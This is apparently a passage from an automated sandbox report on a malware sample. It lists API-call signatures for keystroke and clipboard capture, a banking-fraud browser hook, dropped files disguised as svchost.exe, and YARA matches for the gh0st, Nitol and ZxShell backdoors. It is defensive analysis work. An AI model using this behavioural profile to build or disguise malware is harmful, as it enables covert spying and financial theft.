                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,3_2_1000FA90
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat,3_2_10009A00
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,5_2_00457B94

                E-Banking Fraud

                barindex
                Source: C:\Windows\Temp\server.exeCode function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command3_2_1000A6B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command8_2_1000A6B0
                Source: cmd.exeProcess created: 65

                System Summary

                barindex
                Source: dump.pcap, type: PCAPMatched rule: gh0st Author: https://github.com/jackcr/
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
                Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10002800 NtdllDefWindowProc_A,3_2_10002800
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10002800 NtdllDefWindowProc_A,8_2_10002800
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0042E150: DeviceIoControl,5_2_0042E150
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_0040351A
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10012010 ExitWindowsEx,3_2_10012010
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,3_2_1000B0F0
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043A500
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043AD30
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043ADF0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10012010 ExitWindowsEx,8_2_10012010
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,8_2_1000B0F0
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CCJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\05CA35CCJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726Jump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\svchost.exeJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\SysWOW64\033726\RCX773C.tmpJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\kkJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\ttJump to behavior
                Source: C:\Windows\Temp\server.exeFile created: C:\Windows\bbJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\svchost.exe
                Source: C:\Windows\SysWOW64\033726\svchost.exeFile created: C:\Windows\SysWOW64\034031\RCX8B31.tmp
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004046CA0_2_004046CA
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405FA80_2_00405FA8
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_004074702_2_00407470
                Source: C:\Windows\Temp\server.exeCode function: 3_2_004023C93_2_004023C9
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100378103_2_10037810
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100528163_2_10052816
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1005401A3_2_1005401A
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100440203_2_10044020
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100510293_2_10051029
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100430303_2_10043030
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100370403_2_10037040
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100418503_2_10041850
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002F0603_2_1002F060
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D0803_2_1001D080
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100360803_2_10036080
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C0903_2_1002C090
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100450903_2_10045090
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C8A03_2_1002C8A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002F8B03_2_1002F8B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100380B03_2_100380B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100348C03_2_100348C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100388C03_2_100388C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003F0C03_2_1003F0C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100678C03_2_100678C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100350E03_2_100350E0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100398F03_2_100398F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100518F13_2_100518F1
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100359003_2_10035900
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100409403_2_10040940
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100421703_2_10042170
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001C9903_2_1001C990
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002E9A03_2_1002E9A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100321B03_2_100321B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100369B03_2_100369B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100229C03_2_100229C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100289C03_2_100289C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004C1D03_2_1004C1D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100579D03_2_100579D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100302003_2_10030200
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100342003_2_10034200
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10042A003_2_10042A00
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100412203_2_10041220
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10017A303_2_10017A30
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003CA303_2_1003CA30
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10043A303_2_10043A30
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10031A403_2_10031A40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001DA503_2_1001DA50
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10040A503_2_10040A50
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10018A703_2_10018A70
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10014A703_2_10014A70
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003EA803_2_1003EA80
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10054ABB3_2_10054ABB
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100312D03_2_100312D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003A2D03_2_1003A2D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002E2E03_2_1002E2E0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10032AE03_2_10032AE0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001E2F03_2_1001E2F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100682F03_2_100682F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10037B103_2_10037B10
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003C3103_2_1003C310
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003BB203_2_1003BB20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004A3203_2_1004A320
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10041B203_2_10041B20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10030B403_2_10030B40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004F34F3_2_1004F34F
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C3503_2_1002C350
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100173603_2_10017360
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100383603_2_10038360
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D3703_2_1001D370
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003D3903_2_1003D390
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001ABA03_2_1001ABA0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100393A03_2_100393A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100563A03_2_100563A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004FBC53_2_1004FBC5
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004B3C03_2_1004B3C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100233F03_2_100233F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003DBF03_2_1003DBF0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100413F03_2_100413F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100534183_2_10053418
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1005141B3_2_1005141B
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100424203_2_10042420
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001543E3_2_1001543E
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10040C403_2_10040C40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10034C703_2_10034C70
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001C4803_2_1001C480
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001ACA03_2_1001ACA0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100364B03_2_100364B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002DCC03_2_1002DCC0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10035CC03_2_10035CC0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100554E03_2_100554E0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100334F03_2_100334F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100544FD3_2_100544FD
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003AD003_2_1003AD00
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10015D103_2_10015D10
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001CD203_2_1001CD20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100355403_2_10035540
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003FD403_2_1003FD40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100345603_2_10034560
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C5703_2_1002C570
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10051DC73_2_10051DC7
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003CDC03_2_1003CDC0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100415C03_2_100415C0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100145D03_2_100145D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004A5D03_2_1004A5D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10016DE03_2_10016DE0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10039DE03_2_10039DE0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1004CDE03_2_1004CDE0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100505F73_2_100505F7
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10041DF03_2_10041DF0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10040E003_2_10040E00
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10037E103_2_10037E10
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100386103_2_10038610
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001DE403_2_1001DE40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D6503_2_1001D650
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10038E503_2_10038E50
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10022E603_2_10022E60
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10064E703_2_10064E70
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001568D3_2_1001568D
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003B6903_2_1003B690
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003C6A03_2_1003C6A0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100656D03_2_100656D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10066EE03_2_10066EE0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10033EF03_2_10033EF0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003F7003_2_1003F700
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10057F203_2_10057F20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100137303_2_10013730
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10063F303_2_10063F30
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100637603_2_10063760
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10046F903_2_10046F90
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10040FC03_2_10040FC0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1001BFD03_2_1001BFD0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1003A7D03_2_1003A7D0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100287F03_2_100287F0
                Source: C:\Windows\Temp\v5.exeCode function: 4_2_004074704_2_00407470
                Source: C:\Windows\Temp\ .exeCode function: 5_2_004330205_2_00433020
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00458C585_2_00458C58
                Source: C:\Windows\Temp\ .exeCode function: 5_2_004526555_2_00452655
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00447B9C5_2_00447B9C
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0044DDAB5_2_0044DDAB
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00443ED85_2_00443ED8
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_004023C98_2_004023C9
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100378108_2_10037810
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100528168_2_10052816
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1005401A8_2_1005401A
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100440208_2_10044020
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100510298_2_10051029
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100430308_2_10043030
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100370408_2_10037040
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100418508_2_10041850
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002F0608_2_1002F060
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001D0808_2_1001D080
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100360808_2_10036080
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002C0908_2_1002C090
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100450908_2_10045090
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002C8A08_2_1002C8A0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002F8B08_2_1002F8B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100380B08_2_100380B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100348C08_2_100348C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100388C08_2_100388C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003F0C08_2_1003F0C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100678C08_2_100678C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100350E08_2_100350E0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100398F08_2_100398F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100518F18_2_100518F1
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100359008_2_10035900
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100409408_2_10040940
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100421708_2_10042170
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001C9908_2_1001C990
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002E9A08_2_1002E9A0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100321B08_2_100321B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100369B08_2_100369B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100229C08_2_100229C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100289C08_2_100289C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004C1D08_2_1004C1D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100579D08_2_100579D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100302008_2_10030200
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100342008_2_10034200
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10042A008_2_10042A00
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100412208_2_10041220
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10017A308_2_10017A30
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003CA308_2_1003CA30
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10043A308_2_10043A30
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10031A408_2_10031A40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001DA508_2_1001DA50
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10040A508_2_10040A50
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10018A708_2_10018A70
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10014A708_2_10014A70
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003EA808_2_1003EA80
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10054ABB8_2_10054ABB
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100312D08_2_100312D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003A2D08_2_1003A2D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002E2E08_2_1002E2E0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10032AE08_2_10032AE0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001E2F08_2_1001E2F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100682F08_2_100682F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10037B108_2_10037B10
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003C3108_2_1003C310
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003BB208_2_1003BB20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004A3208_2_1004A320
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10041B208_2_10041B20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10030B408_2_10030B40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004F34F8_2_1004F34F
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002C3508_2_1002C350
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100173608_2_10017360
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100383608_2_10038360
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001D3708_2_1001D370
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003D3908_2_1003D390
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001ABA08_2_1001ABA0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100393A08_2_100393A0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100563A08_2_100563A0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004FBC58_2_1004FBC5
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004B3C08_2_1004B3C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100233F08_2_100233F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003DBF08_2_1003DBF0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100413F08_2_100413F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100534188_2_10053418
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1005141B8_2_1005141B
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100424208_2_10042420
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001543E8_2_1001543E
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10040C408_2_10040C40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10034C708_2_10034C70
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001C4808_2_1001C480
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001ACA08_2_1001ACA0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100364B08_2_100364B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002DCC08_2_1002DCC0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10035CC08_2_10035CC0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100554E08_2_100554E0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100334F08_2_100334F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100544FD8_2_100544FD
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003AD008_2_1003AD00
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10015D108_2_10015D10
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001CD208_2_1001CD20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100355408_2_10035540
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003FD408_2_1003FD40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100345608_2_10034560
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1002C5708_2_1002C570
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10051DC78_2_10051DC7
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003CDC08_2_1003CDC0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100415C08_2_100415C0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100145D08_2_100145D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004A5D08_2_1004A5D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10016DE08_2_10016DE0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10039DE08_2_10039DE0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1004CDE08_2_1004CDE0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100505F78_2_100505F7
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10041DF08_2_10041DF0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10040E008_2_10040E00
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10037E108_2_10037E10
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100386108_2_10038610
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001DE408_2_1001DE40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001D6508_2_1001D650
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10038E508_2_10038E50
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10022E608_2_10022E60
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10064E708_2_10064E70
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001568D8_2_1001568D
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003B6908_2_1003B690
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003C6A08_2_1003C6A0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100656D08_2_100656D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10066EE08_2_10066EE0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10033EF08_2_10033EF0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003F7008_2_1003F700
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10057F208_2_10057F20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100137308_2_10013730
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10063F308_2_10063F30
